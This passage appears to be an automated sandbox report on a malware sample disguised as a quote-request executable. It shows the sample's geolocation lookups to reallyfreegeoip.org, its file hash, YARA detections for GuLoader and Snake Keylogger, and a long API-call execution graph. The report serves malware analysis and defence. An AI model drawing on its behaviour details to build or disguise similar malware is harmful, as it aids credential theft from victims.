                                                                                        2024-12-03 14:24:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.949975172.67.177.1344432052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-03 14:24:11 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-03 14:24:12 UTC876INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:11 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 113274
                                                                                        Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UfHFfTha6t4CB6MZhMUCR4qgg9p2Obhvx4mxCdeOgp0dfh2uUfNJ3zNNig2hModilKKShzEux0TnS0%2FVrpsg6lfD2%2BivbUT8P3lemBzY%2FIDHwUUl0qWDXPoDhCiVlHyVybPX7czy"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ec4380a7dc48c12-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1910&min_rtt=1907&rtt_var=721&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1511387&cwnd=177&unsent_bytes=0&cid=b7334f78a177ec91&ts=486&x=0"
                                                                                        2024-12-03 14:24:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.949984172.67.177.1344432052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-03 14:24:17 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-03 14:24:17 UTC885INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:17 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 113280
                                                                                        Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BK3GAz3iIoDFD4bu3eMVSfK6geY%2FokeI91%2FSImFTpZ0NlPimGrWRQzUTtjEdPDdj8iKZe2cWa39YkIsRINf4B3O%2BgP0iN%2F88dy5D8nzO9slOY91qm2hQE%2B%2FleB7KIUrqq71RulFB"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ec4382cfd670f68-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1555&rtt_var=588&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1877813&cwnd=236&unsent_bytes=0&cid=79e1c80e3cd18898&ts=2858&x=0"
                                                                                        2024-12-03 14:24:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:09:22:07
                                                                                        Start date:03/12/2024
                                                                                        Path:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:757'168 bytes
                                                                                        MD5 hash:1E5FBBEF8F5AD057FC7B2210A2070E9B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2239950600.00000000079ED000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:09:23:36
                                                                                        Start date:03/12/2024
                                                                                        Path:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:757'168 bytes
                                                                                        MD5 hash:1E5FBBEF8F5AD057FC7B2210A2070E9B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:20.1%
                                                                                          Dynamic/Decrypted Code Coverage:15.1%
                                                                                          Signature Coverage:18.9%
                                                                                          Total number of Nodes:1508
                                                                                          Total number of Limit Nodes:45
                                                                                          execution_graph 4978 10001000 4981 1000101b 4978->4981 4988 1000152e 4981->4988 4983 10001020 4984 10001024 4983->4984 4985 10001027 GlobalAlloc 4983->4985 4986 10001555 2 API calls 4984->4986 4985->4984 4987 10001019 4986->4987 4989 10001243 3 API calls 4988->4989 4990 10001534 4989->4990 4991 1000153a 4990->4991 4992 10001546 GlobalFree 4990->4992 4991->4983 4992->4983 4993 401d41 GetDC GetDeviceCaps 4994 402b1d 18 API calls 4993->4994 4995 401d5f MulDiv ReleaseDC 4994->4995 4996 402b1d 18 API calls 4995->4996 4997 401d7e 4996->4997 4998 405f0c 18 API calls 4997->4998 4999 401db7 CreateFontIndirectW 4998->4999 5000 4024e8 4999->5000 5001 401a42 5002 402b1d 18 API calls 5001->5002 5003 401a48 5002->5003 5004 402b1d 18 API calls 5003->5004 5005 4019f0 5004->5005 5006 404243 lstrcpynW lstrlenW 5007 402746 5008 402741 5007->5008 5008->5007 5009 402756 FindNextFileW 5008->5009 5010 4027a8 5009->5010 5012 402761 5009->5012 5013 405eea lstrcpynW 5010->5013 5013->5012 5014 401cc6 5015 402b1d 18 API calls 5014->5015 5016 401cd9 SetWindowLongW 5015->5016 5017 4029c7 5016->5017 4137 401dc7 4145 402b1d 4137->4145 4139 401dcd 4140 402b1d 18 API calls 4139->4140 4141 401dd6 4140->4141 4142 401de8 EnableWindow 4141->4142 4143 401ddd ShowWindow 4141->4143 4144 4029c7 4142->4144 4143->4144 4146 405f0c 18 API calls 4145->4146 4147 402b31 4146->4147 4147->4139 5025 4045ca 5026 4045f6 5025->5026 5027 404607 5025->5027 5086 4056aa GetDlgItemTextW 5026->5086 5029 404613 GetDlgItem 5027->5029 5035 404672 5027->5035 5031 404627 5029->5031 5030 404601 5033 40617e 5 API calls 5030->5033 5034 40463b SetWindowTextW 5031->5034 5039 4059e0 4 API calls 5031->5039 5032 404756 5036 4048f7 5032->5036 5088 4056aa GetDlgItemTextW 5032->5088 5033->5027 5040 40412f 19 API calls 5034->5040 5035->5032 5035->5036 5041 405f0c 18 API calls 5035->5041 5038 404196 8 API calls 5036->5038 5046 40490b 5038->5046 5047 404631 5039->5047 5043 404657 5040->5043 5044 4046e6 SHBrowseForFolderW 5041->5044 5042 404786 5045 405a3d 18 API calls 5042->5045 5048 40412f 19 API calls 5043->5048 5044->5032 5049 4046fe CoTaskMemFree 5044->5049 5050 40478c 5045->5050 5047->5034 5053 405935 3 API calls 5047->5053 5051 404665 5048->5051 5052 405935 3 API calls 5049->5052 5089 405eea lstrcpynW 5050->5089 5087 404164 SendMessageW 5051->5087 5055 40470b 5052->5055 5053->5034 5058 404742 SetDlgItemTextW 5055->5058 5062 405f0c 18 API calls 5055->5062 5057 40466b 5060 406254 3 API calls 5057->5060 5058->5032 5059 4047a3 5061 406254 3 API calls 5059->5061 5060->5035 5069 4047ab 5061->5069 5063 40472a lstrcmpiW 5062->5063 5063->5058 5066 40473b lstrcatW 5063->5066 5064 4047ea 5090 405eea lstrcpynW 5064->5090 5066->5058 5067 4047f1 5068 4059e0 4 API calls 5067->5068 5070 4047f7 GetDiskFreeSpaceW 5068->5070 5069->5064 5073 405981 2 API calls 5069->5073 5074 40483c 5069->5074 5072 40481a MulDiv 5070->5072 5070->5074 5072->5074 5073->5069 5075 4048a6 5074->5075 5076 404978 21 API calls 5074->5076 5077 4048c9 5075->5077 5079 40140b 2 API calls 5075->5079 5078 404898 5076->5078 5091 404151 EnableWindow 5077->5091 5081 4048a8 SetDlgItemTextW 5078->5081 5082 40489d 5078->5082 5079->5077 5081->5075 5084 404978 21 API calls 5082->5084 5083 4048e5 5083->5036 5092 40455f 5083->5092 5084->5075 5086->5030 5087->5057 5088->5042 5089->5059 5090->5067 5091->5083 5093 404572 SendMessageW 5092->5093 5094 40456d 5092->5094 5093->5036 5094->5093 5095 401bca 5096 402b1d 18 API calls 5095->5096 5097 401bd1 5096->5097 5098 402b1d 18 API calls 5097->5098 5099 401bdb 5098->5099 5100 401beb 5099->5100 5102 402b3a 18 API calls 5099->5102 5101 401bfb 5100->5101 5103 402b3a 18 API calls 5100->5103 5104 401c06 5101->5104 5105 401c4a 5101->5105 5102->5100 5103->5101 5106 402b1d 18 API calls 5104->5106 5107 402b3a 18 API calls 5105->5107 5108 401c0b 5106->5108 5109 401c4f 5107->5109 5111 402b1d 18 API calls 5108->5111 5110 402b3a 18 API calls 5109->5110 5112 401c58 FindWindowExW 5110->5112 5113 401c14 5111->5113 5116 401c7a 5112->5116 5114 401c3a SendMessageW 5113->5114 5115 401c1c SendMessageTimeoutW 5113->5115 5114->5116 5115->5116 5117 40194b 5118 402b1d 18 API calls 5117->5118 5119 401952 5118->5119 5120 402b1d 18 API calls 5119->5120 5121 40195c 5120->5121 5122 402b3a 18 API calls 5121->5122 5123 401965 5122->5123 5124 401979 lstrlenW 5123->5124 5125 4019b5 5123->5125 5126 401983 5124->5126 5126->5125 5130 405eea lstrcpynW 5126->5130 5128 40199e 5128->5125 5129 4019ab lstrlenW 5128->5129 5129->5125 5130->5128 5134 4042cc 5136 4043fe 5134->5136 5137 4042e4 5134->5137 5135 404468 5138 404472 GetDlgItem 5135->5138 5139 40453a 5135->5139 5136->5135 5136->5139 5143 404439 GetDlgItem SendMessageW 5136->5143 5140 40412f 19 API calls 5137->5140 5141 4044fb 5138->5141 5142 40448c 5138->5142 5145 404196 8 API calls 5139->5145 5144 40434b 5140->5144 5141->5139 5146 40450d 5141->5146 5142->5141 5150 4044b2 6 API calls 5142->5150 5165 404151 EnableWindow 5143->5165 5148 40412f 19 API calls 5144->5148 5149 404535 5145->5149 5151 404523 5146->5151 5152 404513 SendMessageW 5146->5152 5154 404358 CheckDlgButton 5148->5154 5150->5141 5151->5149 5155 404529 SendMessageW 5151->5155 5152->5151 5153 404463 5156 40455f SendMessageW 5153->5156 5163 404151 EnableWindow 5154->5163 5155->5149 5156->5135 5158 404376 GetDlgItem 5164 404164 SendMessageW 5158->5164 5160 40438c SendMessageW 5161 4043b2 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5160->5161 5162 4043a9 GetSysColor 5160->5162 5161->5149 5162->5161 5163->5158 5164->5160 5165->5153 5166 4024cc 5167 402b3a 18 API calls 5166->5167 5168 4024d3 5167->5168 5171 405b56 GetFileAttributesW CreateFileW 5168->5171 5170 4024df 5171->5170 4208 1000278d 4209 100027dd 4208->4209 4210 1000279d VirtualProtect 4208->4210 4210->4209 5172 4019cf 5173 402b3a 18 API calls 5172->5173 5174 4019d6 5173->5174 5175 402b3a 18 API calls 5174->5175 5176 4019df 5175->5176 5177 4019e6 lstrcmpiW 5176->5177 5178 4019f8 lstrcmpW 5176->5178 5179 4019ec 5177->5179 5178->5179 4294 401e51 4295 402b3a 18 API calls 4294->4295 4296 401e57 4295->4296 4297 405194 25 API calls 4296->4297 4298 401e61 4297->4298 4312 405665 CreateProcessW 4298->4312 4301 401ec6 CloseHandle 4305 402793 4301->4305 4302 401e77 WaitForSingleObject 4303 401e89 4302->4303 4304 401e9b GetExitCodeProcess 4303->4304 4315 40628d 4303->4315 4306 401eba 4304->4306 4307 401ead 4304->4307 4306->4301 4310 401eb8 4306->4310 4319 405e31 wsprintfW 4307->4319 4310->4301 4313 401e67 4312->4313 4314 405694 CloseHandle 4312->4314 4313->4301 4313->4302 4313->4305 4314->4313 4316 4062aa PeekMessageW 4315->4316 4317 4062a0 DispatchMessageW 4316->4317 4318 401e90 WaitForSingleObject 4316->4318 4317->4316 4318->4303 4319->4310 4394 401752 4395 402b3a 18 API calls 4394->4395 4396 401759 4395->4396 4397 401781 4396->4397 4398 401779 4396->4398 4435 405eea lstrcpynW 4397->4435 4434 405eea lstrcpynW 4398->4434 4401 40177f 4405 40617e 5 API calls 4401->4405 4402 40178c 4403 405935 3 API calls 4402->4403 4404 401792 lstrcatW 4403->4404 4404->4401 4422 40179e 4405->4422 4406 4017da 4408 405b31 2 API calls 4406->4408 4407 40622d 2 API calls 4407->4422 4408->4422 4410 4017b0 CompareFileTime 4410->4422 4411 401870 4413 405194 25 API calls 4411->4413 4412 401847 4414 405194 25 API calls 4412->4414 4432 40185c 4412->4432 4416 40187a 4413->4416 4414->4432 4415 405eea lstrcpynW 4415->4422 4417 403062 46 API calls 4416->4417 4418 40188d 4417->4418 4419 4018a1 SetFileTime 4418->4419 4420 4018b3 CloseHandle 4418->4420 4419->4420 4423 4018c4 4420->4423 4420->4432 4421 405f0c 18 API calls 4421->4422 4422->4406 4422->4407 4422->4410 4422->4411 4422->4412 4422->4415 4422->4421 4428 4056c6 MessageBoxIndirectW 4422->4428 4433 405b56 GetFileAttributesW CreateFileW 4422->4433 4424 4018c9 4423->4424 4425 4018dc 4423->4425 4426 405f0c 18 API calls 4424->4426 4427 405f0c 18 API calls 4425->4427 4429 4018d1 lstrcatW 4426->4429 4430 4018e4 4427->4430 4428->4422 4429->4430 4431 4056c6 MessageBoxIndirectW 4430->4431 4431->4432 4433->4422 4434->4401 4435->4402 4436 402253 4437 402261 4436->4437 4438 40225b 4436->4438 4439 40226f 4437->4439 4441 402b3a 18 API calls 4437->4441 4440 402b3a 18 API calls 4438->4440 4442 402b3a 18 API calls 4439->4442 4444 40227d 4439->4444 4440->4437 4441->4439 4442->4444 4443 402b3a 18 API calls 4445 402286 WritePrivateProfileStringW 4443->4445 4444->4443 5180 4052d3 5181 4052f4 GetDlgItem GetDlgItem GetDlgItem 5180->5181 5182 40547f 5180->5182 5225 404164 SendMessageW 5181->5225 5184 4054b0 5182->5184 5185 405488 GetDlgItem CreateThread CloseHandle 5182->5185 5187 4054db 5184->5187 5188 405500 5184->5188 5189 4054c7 ShowWindow ShowWindow 5184->5189 5185->5184 5186 405365 5191 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5186->5191 5190 40553b 5187->5190 5193 405515 ShowWindow 5187->5193 5194 4054ef 5187->5194 5195 404196 8 API calls 5188->5195 5227 404164 SendMessageW 5189->5227 5190->5188 5198 405549 SendMessageW 5190->5198 5196 4053db 5191->5196 5197 4053bf SendMessageW SendMessageW 5191->5197 5200 405535 5193->5200 5201 405527 5193->5201 5199 404108 SendMessageW 5194->5199 5207 40550e 5195->5207 5204 4053e0 SendMessageW 5196->5204 5205 4053ee 5196->5205 5197->5196 5206 405562 CreatePopupMenu 5198->5206 5198->5207 5199->5188 5203 404108 SendMessageW 5200->5203 5202 405194 25 API calls 5201->5202 5202->5200 5203->5190 5204->5205 5209 40412f 19 API calls 5205->5209 5208 405f0c 18 API calls 5206->5208 5210 405572 AppendMenuW 5208->5210 5211 4053fe 5209->5211 5212 4055a2 TrackPopupMenu 5210->5212 5213 40558f GetWindowRect 5210->5213 5214 405407 ShowWindow 5211->5214 5215 40543b GetDlgItem SendMessageW 5211->5215 5212->5207 5217 4055bd 5212->5217 5213->5212 5218 40542a 5214->5218 5219 40541d ShowWindow 5214->5219 5215->5207 5216 405462 SendMessageW SendMessageW 5215->5216 5216->5207 5220 4055d9 SendMessageW 5217->5220 5226 404164 SendMessageW 5218->5226 5219->5218 5220->5220 5221 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5220->5221 5223 40561b SendMessageW 5221->5223 5223->5223 5224 405644 GlobalUnlock SetClipboardData CloseClipboard 5223->5224 5224->5207 5225->5186 5226->5215 5227->5187 5228 402454 5229 402c44 19 API calls 5228->5229 5230 40245e 5229->5230 5231 402b1d 18 API calls 5230->5231 5232 402467 5231->5232 5233 40248b RegEnumValueW 5232->5233 5234 40247f RegEnumKeyW 5232->5234 5236 402793 5232->5236 5235 4024a4 RegCloseKey 5233->5235 5233->5236 5234->5235 5235->5236 5238 401ed4 5239 402b3a 18 API calls 5238->5239 5240 401edb 5239->5240 5241 40622d 2 API calls 5240->5241 5242 401ee1 5241->5242 5244 401ef2 5242->5244 5245 405e31 wsprintfW 5242->5245 5245->5244 5246 4022d5 5247 402305 5246->5247 5248 4022da 5246->5248 5249 402b3a 18 API calls 5247->5249 5250 402c44 19 API calls 5248->5250 5251 40230c 5249->5251 5252 4022e1 5250->5252 5257 402b7a RegOpenKeyExW 5251->5257 5253 402b3a 18 API calls 5252->5253 5256 402322 5252->5256 5254 4022f2 RegDeleteValueW RegCloseKey 5253->5254 5254->5256 5263 402ba5 5257->5263 5266 402bf1 5257->5266 5258 402bcb RegEnumKeyW 5259 402bdd RegCloseKey 5258->5259 5258->5263 5261 406254 3 API calls 5259->5261 5260 402c02 RegCloseKey 5260->5266 5264 402bed 5261->5264 5262 402b7a 3 API calls 5262->5263 5263->5258 5263->5259 5263->5260 5263->5262 5265 402c1d RegDeleteKeyW 5264->5265 5264->5266 5265->5266 5266->5256 4459 403c57 4460 403daa 4459->4460 4461 403c6f 4459->4461 4463 403dfb 4460->4463 4464 403dbb GetDlgItem GetDlgItem 4460->4464 4461->4460 4462 403c7b 4461->4462 4465 403c86 SetWindowPos 4462->4465 4466 403c99 4462->4466 4468 403e55 4463->4468 4473 401389 2 API calls 4463->4473 4467 40412f 19 API calls 4464->4467 4465->4466 4470 403cb6 4466->4470 4471 403c9e ShowWindow 4466->4471 4472 403de5 SetClassLongW 4467->4472 4469 40417b SendMessageW 4468->4469 4490 403da5 4468->4490 4500 403e67 4469->4500 4474 403cd8 4470->4474 4475 403cbe DestroyWindow 4470->4475 4471->4470 4476 40140b 2 API calls 4472->4476 4477 403e2d 4473->4477 4479 403cdd SetWindowLongW 4474->4479 4480 403cee 4474->4480 4478 4040d9 4475->4478 4476->4463 4477->4468 4481 403e31 SendMessageW 4477->4481 4489 4040e9 ShowWindow 4478->4489 4478->4490 4479->4490 4484 403d97 4480->4484 4485 403cfa GetDlgItem 4480->4485 4481->4490 4482 40140b 2 API calls 4482->4500 4483 4040ba DestroyWindow EndDialog 4483->4478 4488 404196 8 API calls 4484->4488 4486 403d2a 4485->4486 4487 403d0d SendMessageW IsWindowEnabled 4485->4487 4492 403d37 4486->4492 4493 403d7e SendMessageW 4486->4493 4494 403d4a 4486->4494 4505 403d2f 4486->4505 4487->4486 4487->4490 4488->4490 4489->4490 4491 405f0c 18 API calls 4491->4500 4492->4493 4492->4505 4493->4484 4497 403d52 4494->4497 4498 403d67 4494->4498 4496 40412f 19 API calls 4496->4500 4502 40140b 2 API calls 4497->4502 4501 40140b 2 API calls 4498->4501 4499 403d65 4499->4484 4500->4482 4500->4483 4500->4490 4500->4491 4500->4496 4504 40412f 19 API calls 4500->4504 4520 403ffa DestroyWindow 4500->4520 4503 403d6e 4501->4503 4502->4505 4503->4484 4503->4505 4506 403ee2 GetDlgItem 4504->4506 4533 404108 4505->4533 4507 403ef7 4506->4507 4508 403eff ShowWindow KiUserCallbackDispatcher 4506->4508 4507->4508 4530 404151 EnableWindow 4508->4530 4510 403f29 EnableWindow 4513 403f3d 4510->4513 4511 403f42 GetSystemMenu EnableMenuItem SendMessageW 4512 403f72 SendMessageW 4511->4512 4511->4513 4512->4513 4513->4511 4531 404164 SendMessageW 4513->4531 4532 405eea lstrcpynW 4513->4532 4516 403fa0 lstrlenW 4517 405f0c 18 API calls 4516->4517 4518 403fb6 SetWindowTextW 4517->4518 4519 401389 2 API calls 4518->4519 4519->4500 4520->4478 4521 404014 CreateDialogParamW 4520->4521 4521->4478 4522 404047 4521->4522 4523 40412f 19 API calls 4522->4523 4524 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4523->4524 4525 401389 2 API calls 4524->4525 4526 404098 4525->4526 4526->4490 4527 4040a0 ShowWindow 4526->4527 4528 40417b SendMessageW 4527->4528 4529 4040b8 4528->4529 4529->4478 4530->4510 4531->4513 4532->4516 4534 404115 SendMessageW 4533->4534 4535 40410f 4533->4535 4534->4499 4535->4534 5267 4014d7 5268 402b1d 18 API calls 5267->5268 5269 4014dd Sleep 5268->5269 5271 4029c7 5269->5271 4759 40335a #17 SetErrorMode OleInitialize 4760 406254 3 API calls 4759->4760 4761 40339d SHGetFileInfoW 4760->4761 4832 405eea lstrcpynW 4761->4832 4763 4033c8 GetCommandLineW 4833 405eea lstrcpynW 4763->4833 4765 4033da GetModuleHandleW 4766 4033f2 4765->4766 4767 405962 CharNextW 4766->4767 4768 403401 CharNextW 4767->4768 4776 403411 4768->4776 4769 4034e6 4770 4034fa GetTempPathW 4769->4770 4834 403326 4770->4834 4772 403512 4773 403516 GetWindowsDirectoryW lstrcatW 4772->4773 4774 40356c DeleteFileW 4772->4774 4777 403326 11 API calls 4773->4777 4842 402dbc GetTickCount GetModuleFileNameW 4774->4842 4775 405962 CharNextW 4775->4776 4776->4769 4776->4775 4782 4034e8 4776->4782 4779 403532 4777->4779 4779->4774 4781 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4779->4781 4780 403580 4783 403618 4780->4783 4786 403608 4780->4786 4790 405962 CharNextW 4780->4790 4785 403326 11 API calls 4781->4785 4926 405eea lstrcpynW 4782->4926 4929 4037c2 4783->4929 4789 403564 4785->4789 4872 4038b4 4786->4872 4789->4774 4789->4783 4794 40359b 4790->4794 4792 403631 4795 4056c6 MessageBoxIndirectW 4792->4795 4793 403727 4796 4037aa ExitProcess 4793->4796 4801 406254 3 API calls 4793->4801 4798 4035e2 4794->4798 4799 403647 lstrcatW lstrcmpiW 4794->4799 4800 40363f ExitProcess 4795->4800 4803 405a3d 18 API calls 4798->4803 4799->4783 4804 403663 CreateDirectoryW SetCurrentDirectoryW 4799->4804 4802 403736 4801->4802 4805 406254 3 API calls 4802->4805 4806 4035ee 4803->4806 4807 403686 4804->4807 4808 40367b 4804->4808 4809 40373f 4805->4809 4806->4783 4927 405eea lstrcpynW 4806->4927 4939 405eea lstrcpynW 4807->4939 4938 405eea lstrcpynW 4808->4938 4812 406254 3 API calls 4809->4812 4814 403748 4812->4814 4816 403796 ExitWindowsEx 4814->4816 4823 403756 GetCurrentProcess 4814->4823 4815 4035fd 4928 405eea lstrcpynW 4815->4928 4816->4796 4819 4037a3 4816->4819 4818 405f0c 18 API calls 4820 4036c5 DeleteFileW 4818->4820 4821 40140b 2 API calls 4819->4821 4822 4036d2 CopyFileW 4820->4822 4829 403694 4820->4829 4821->4796 4822->4829 4826 403766 4823->4826 4824 40371b 4827 405d84 40 API calls 4824->4827 4825 405d84 40 API calls 4825->4829 4826->4816 4827->4783 4828 405f0c 18 API calls 4828->4829 4829->4818 4829->4824 4829->4825 4829->4828 4830 405665 2 API calls 4829->4830 4831 403706 CloseHandle 4829->4831 4830->4829 4831->4829 4832->4763 4833->4765 4835 40617e 5 API calls 4834->4835 4837 403332 4835->4837 4836 40333c 4836->4772 4837->4836 4838 405935 3 API calls 4837->4838 4839 403344 CreateDirectoryW 4838->4839 4940 405b85 4839->4940 4944 405b56 GetFileAttributesW CreateFileW 4842->4944 4844 402dff 4871 402e0c 4844->4871 4945 405eea lstrcpynW 4844->4945 4846 402e22 4847 405981 2 API calls 4846->4847 4848 402e28 4847->4848 4946 405eea lstrcpynW 4848->4946 4850 402e33 GetFileSize 4851 402f34 4850->4851 4870 402e4a 4850->4870 4852 402d1a 33 API calls 4851->4852 4854 402f3b 4852->4854 4853 4032f9 ReadFile 4853->4870 4855 402f77 GlobalAlloc 4854->4855 4854->4871 4948 40330f SetFilePointer 4854->4948 4858 402f8e 4855->4858 4856 402fcf 4859 402d1a 33 API calls 4856->4859 4863 405b85 2 API calls 4858->4863 4859->4871 4860 402f58 4861 4032f9 ReadFile 4860->4861 4864 402f63 4861->4864 4862 402d1a 33 API calls 4862->4870 4865 402f9f CreateFileW 4863->4865 4864->4855 4864->4871 4866 402fd9 